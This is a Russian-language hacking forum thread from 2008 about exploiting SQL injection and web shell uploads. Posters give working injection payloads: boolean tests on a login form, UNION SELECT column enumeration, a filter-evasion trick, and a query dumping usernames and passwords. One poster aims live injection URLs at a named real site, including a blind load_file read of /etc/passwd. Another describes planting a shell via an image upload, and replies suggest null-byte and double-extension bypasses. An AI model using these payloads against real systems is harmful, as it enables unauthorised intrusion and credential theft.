Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

16.03.2008, 01:52
|
|
Познающий
Регистрация: 22.01.2007
Сообщений: 40
Провел на форуме: 179857
Репутация:
4
|
|
Сообщение от blackybr
пошли два постзапроса и проверь. на ппример (поиграй с кавычкой и and/or)
POST /index.php?page=uvod HTTP/1.0
username=aqwerty&pass=11111' or 1=1/*&pass1=111111&b1=Ok
и
POST /index.php?page=uvod HTTP/1.0
username=aqwerty&pass=11111' or 2=1/*&pass1=111111&b1=Ok
и посмотри разные ли ответы сервера
ответы одинаковы. страница отобрадается как и отображалась
|
|
|

16.03.2008, 01:59
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
4y4o, тогда скорее всего скули нет
|
|
|

16.03.2008, 02:04
|
|
Познающий
Регистрация: 22.01.2007
Сообщений: 40
Провел на форуме: 179857
Репутация:
4
|
|
лана проехали. но дайте понять смысл. если параметры не верны страница должна отобразится с ошибкой, если верны то без. это означает что скуль есть. так? дальнейшие действия?
|
|
|

16.03.2008, 07:07
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме: 500748
Репутация:
137
|
|
4y4o дальше нужно подобрать количество полей
например
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,6/*
можно задать больше 6 . и если на странице отобразится скажем цифра 4 то значит отобразилось значение 4 поля(самый простой метод)
можно так же подобрать количество полей (лично я так подбираю) с помощью оператора order by
например
ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+3/*
если ошибки нет то полей больше трёх или три
берём например больше
ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+10/*
если ошибка есть то полей меньше 10
и так короче находи цифру с которой ошибки небудет но следущая цифра должна отображать ошибку
скажем нашли количество полей например оно равно 6
дальше проверяеш стоит ли фильтрация на какиенибуть символы задаём команду скажем узнать версию майскула
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,version(),7,8/*
если отобразилась версия то фильтрации нет если нет то попробуй закодировать эту команду скажем так
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,aes_decrypt(aes_encrypt(con cat(version()),1),1),7,8/*
отобразилась версия. дальше нужно узнать в какой таблице лежат данные юзерей (можно с помощью брутфорса, надо бы написать мне такой а хотя уже есть наверно)
узнали например имя этой таблицы polzovateli
и выводим логин и пароль первого пользователя(он в большинстве случаев админ)
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,5,concat(username,0x3a,password)+from+ polzovateli+limit+1,1/*
|
|
|

16.03.2008, 07:30
|
|
Новичок
Регистрация: 15.07.2007
Сообщений: 24
Провел на форуме: 593997
Репутация:
11
|
|
Вот запрос, судя по всему 3 таблицы :
http://city.ab.ru/index.php?pg=show&kat=-1+order+by+3/*
дальше
http://city.ab.ru/index.php?pg=show&kat=-1+union+select+1,2,3/*
You have an error in your SQL syntax near 'union select 1,2,3/*' at line 1
Копаем дальше... непонятно пока ничего
хех, версия мускла вроде как 3тья!!!!
что можно еще накопать ?
|
|
|

16.03.2008, 07:46
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
Сообщение от hiv
хех, версия мускла вроде как 3тья!!!!
что можно еще накопать ?
Файлы можешь читать, так что скрипт пиши, ищи полезные файлы и читай
Код:
http://city.ab.ru/index.php?pg=show&kat=12%20and%20ascii(substring(load_file(0x2F6574632F706173737764),1,1))=35
больше ничего полезного имхо, т.к. кавычки экранируются
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 16.03.2008 в 07:50..
|
|
|

16.03.2008, 16:24
|
|
Новичок
Регистрация: 07.05.2007
Сообщений: 12
Провел на форуме: 77696
Репутация:
1
|
|
залил шелл на сайт через форму для загрузки изображений, но чтобы его залить пришлось расширение поменять на gif, а как php то теперь сделать? ((((
при переходе на изображение просто пустое окно огромного размера
|
|
|

16.03.2008, 16:29
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме: 4192567
Репутация:
2145
|
|
попробуй в конце урл добавить %00
или залей как .php.gif
|
|
|

16.03.2008, 16:40
|
|
Новичок
Регистрация: 07.05.2007
Сообщений: 12
Провел на форуме: 77696
Репутация:
1
|
|
эхх нитак и нитак не получилось (((
после заливки там меняется название файла и поулчается то же самое blablabal.gif,
%00 тоже не помогло ( Всеравно спасибо
|
|
|

16.03.2008, 17:08
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
Сообщение от ZET36
4y4o дальше нужно подобрать количество полей
например
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,6/*
можно задать больше 6 . и если на странице отобразится скажем цифра 4 то значит отобразилось значение 4 поля(самый простой метод)
можно так же подобрать количество полей (лично я так подбираю) с помощью оператора order by
например
ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+3/*
если ошибки нет то полей больше трёх или три
берём например больше
ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+10/*
если ошибка есть то полей меньше 10
и так короче находи цифру с которой ошибки небудет но следущая цифра должна отображать ошибку
скажем нашли количество полей например оно равно 6
дальше проверяеш стоит ли фильтрация на какиенибуть символы задаём команду скажем узнать версию майскула
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,version(),7,8/*
если отобразилась версия то фильтрации нет если нет то попробуй закодировать эту команду скажем так
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,aes_decrypt(aes_encrypt(con cat(version()),1),1),7,8/*
отобразилась версия. дальше нужно узнать в какой таблице лежат данные юзерей (можно с помощью брутфорса, надо бы написать мне такой а хотя уже есть наверно)
узнали например имя этой таблицы polzovateli
и выводим логин и пароль первого пользователя(он в большинстве случаев админ)
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,5,concat(username,0x3a,password)+from+ polzovateli+limit+1,1/*
бред, если считать что у него скуль в авторизации. где оно по твоему выводить будет?
только посимвольный перебор
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|